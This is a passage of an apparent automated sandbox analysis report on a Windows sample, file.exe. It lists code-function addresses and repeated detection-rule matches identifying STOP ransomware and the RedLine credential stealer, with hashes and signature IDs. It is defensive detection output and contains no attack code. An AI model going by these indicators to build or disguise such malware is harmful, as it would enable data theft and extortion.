          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0233B0B06_2_0233B0B0
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_023330F06_2_023330F0
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_023370E06_2_023370E0
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_023400D06_2_023400D0
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_023391206_2_02339120
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0237E1416_2_0237E141
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0235D1A46_2_0235D1A4
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0237B69F6_2_0237B69F
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0233A6996_2_0233A699
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0233E6E06_2_0233E6E0
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0233C7606_2_0233C760
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0233A79A6_2_0233A79A
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0235D7F16_2_0235D7F1
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_023335206_2_02333520
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_023375206_2_02337520
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0233CA106_2_0233CA10
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_02337A806_2_02337A80
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_02340B006_2_02340B00
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_02332B606_2_02332B60
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0233DBE06_2_0233DBE0
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_023378806_2_02337880
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_023518D06_2_023518D0
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0234A9306_2_0234A930
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0233A9166_2_0233A916
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0235F9B06_2_0235F9B0
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_0235E9A36_2_0235E9A3
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_023359F76_2_023359F7
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_023389D06_2_023389D0
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_02338E606_2_02338E60
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_02364E9F6_2_02364E9F
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_02372D1E6_2_02372D1E
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_02335DF76_2_02335DF7
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_02335DE76_2_02335DE7
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: String function: 02360160 appears 50 times
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: String function: 02358EC0 appears 57 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00428C81 appears 42 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 02208EC0 appears 57 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 02260160 appears 50 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 02258EC0 appears 57 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 004547A0 appears 75 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 02210160 appears 50 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 0042F7C0 appears 99 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 0044F23E appears 53 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00428520 appears 77 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00454E50 appears 42 times
          Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 13.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 13.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 11.2.file.exe.22c15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 11.2.file.exe.22c15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 9.2.file.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 9.2.file.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.file.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.file.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 11.2.file.exe.22c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 11.2.file.exe.22c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.file.exe.21e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.file.exe.21e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 12.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 12.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.file.exe.21e15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.file.exe.21e15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 15.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 15.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.file.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.file.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 5.2.file.exe.22315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 5.2.file.exe.22315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 7.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 7.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 5.2.file.exe.22315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 5.2.file.exe.22315a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 7.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 7.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 13.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 13.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 9.2.file.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 9.2.file.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 15.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 15.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 12.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 12.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000009.00000002.2418701832.00000000021C3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000B.00000002.2503244707.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000006.00000002.2455882872.0000000002183000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000000.00000002.2166960337.000000000214E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000009.00000002.2418903589.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000005.00000002.2271495369.0000000002190000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
